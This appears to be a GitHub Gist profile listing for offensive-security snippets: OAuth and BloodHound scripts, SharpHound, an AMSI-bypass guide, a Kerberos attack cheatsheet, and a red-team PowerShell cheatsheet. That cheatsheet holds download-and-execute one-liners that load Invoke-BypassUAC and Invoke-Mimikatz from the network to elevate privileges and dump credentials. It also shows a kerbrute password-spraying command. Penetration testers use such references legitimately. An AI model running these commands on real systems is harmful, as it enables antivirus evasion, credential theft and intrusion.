| title |
|---|
Windows Privilege Escalation |
https://liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html https://github.com/areyou1or0/Windows https://git.io/JL7sx https://github.com/C0nd4/OSCP-Priv-Esc
Christian Bortone xybytes
xybytes
/ badsectorlabs_scraper.py
Created
July 16, 2025 00:36
A Python script that scrapes the Last Week in Security blog by Bad Sector Labs, follows all archive pages, and searches for posts containing a specific keyword (e.g., Azure).
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| from bs4 import BeautifulSoup | |
| from datetime import datetime | |
| import argparse | |
| BASE_URL = "https://blog.badsectorlabs.com/" | |
| START_PAGE = "index.html" | |
| def get_posts_from_page(url): | |
| """Extract posts (date, title, link) from an index page.""" |
xybytes
/ oauth_client_credentials_flow.py
Created
February 27, 2025 21:14
Retrieve an OAuth 2.0 access token using Client Credentials Flow and call Microsoft Graph API
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import requests | |
| # Configure Argument Parser | |
| parser = argparse.ArgumentParser( | |
| description="Retrieve an OAuth 2.0 access token using Client Credentials Flow and call Microsoft Graph API." | |
| ) | |
| parser.add_argument("--tenant-id", required=True, help="Azure AD Tenant ID") | |
| parser.add_argument("--client-id", required=True, help="Azure AD Application (Client) ID") |
xybytes
/ oauth_authorization_code_flow.py
Created
February 27, 2025 21:14
Retrieve an OAuth 2.0 access token using Authorization Code Flow and call Microsoft APIs
xybytes
/ Windows_Privilege_Escalation.md
Created
November 22, 2024 10:34
xybytes
/ bloodhoundce_import.py
Created
February 26, 2024 17:53
— forked from aconite33/bloodhoundce_import.py
Import large files into BloodHound CE Edition
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| import time | |
| import argparse | |
| import getpass | |
| import os | |
| import sys | |
| def main(): |
xybytes
/ BloodHound_Cypher.md
Created
December 24, 2023 02:48
xybytes
/ SharpHound.ps1
Created
December 22, 2023 00:35
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-BloodHound | |
| { | |
| <# | |
| .SYNOPSIS | |
| Runs the BloodHound C# Ingestor using reflection. The assembly is stored in this file. | |
| .DESCRIPTION | |
| Using reflection and assembly.load, load the compiled BloodHound C# ingestor into memory |
xybytes
/ amsi-bypass.md
Created
September 17, 2023 23:21
— forked from D3Ext/amsi-bypass.md
All methods to bypass AMSI (2022)
To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI
However some methods may be detected by the AV but most of them actually work without problem
The first and worst way to bypass AMSI is downgrading powershell version to 2.0.
xybytes
/ kerberos_attacks_cheatsheet.md
Created
September 17, 2023 23:20
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
xybytes
/ RedTeam_CheatSheet.ps1
Created
September 17, 2023 23:19
— forked from jivoi/RedTeam_CheatSheet.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
NewerOlder